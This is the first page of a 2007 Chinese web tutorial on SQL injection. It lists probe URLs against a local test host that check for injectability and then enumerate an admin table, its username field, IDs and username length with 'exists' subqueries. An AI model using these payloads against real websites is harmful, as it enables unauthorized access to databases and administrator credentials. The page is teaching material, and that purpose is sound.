频道直达 - 专题 - 新闻 - 技巧 - 组网 - 开发 - 安全 - 网络编程 - 图像 - 操作系统 - 数据库 - 教育 - 旅游 - 健康 - 驱动 - 软件下载 - 游戏 - 多媒体 - 解决方案 - BBS
巧巧电脑IT频道Logo302509

简单学习理解掌握SQL注入技术!

来源: 作者:网页教学网 出处:巧巧读书 2007-03-20 进入论坛
关 键 词:数据库  sql注入  os  access  
下一页 1 2 3 4 5 6 7 8 

  检测可否注入

http://127.0.0.1/xx?id=11 and 1=1 (正常页面)

http://127.0.0.1/xx?id=11 and 1=2 (出错页面)


检测表段的


http://127.0.0.1/xx?id=11 and exists (select * from admin)


检测字段的


http://127.0.0.1/xx?id=11 and exists (select username from admin)


检测ID


http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)


检测长度的


http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)


检测长度的


http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)进入论坛讨论。
下一页 1 2 3 4 5 6 7 8 
相关图文阅读
频道图文推荐

旅 游 资 讯
健 康 咨 询
时 尚 咨 询
巧巧读书宗旨
相关专题
热点标签: 数据库  sql注入  os  access  
阅读排行榜
最新技术文档
站内各频道最新更新文档
站内最新制作专题
热门关键字导读
关键字:
站内频道文章精选
搜索您感兴趣的内容
Web 全站
巧巧电脑频道编辑信箱  告诉我们您想看的专题或文章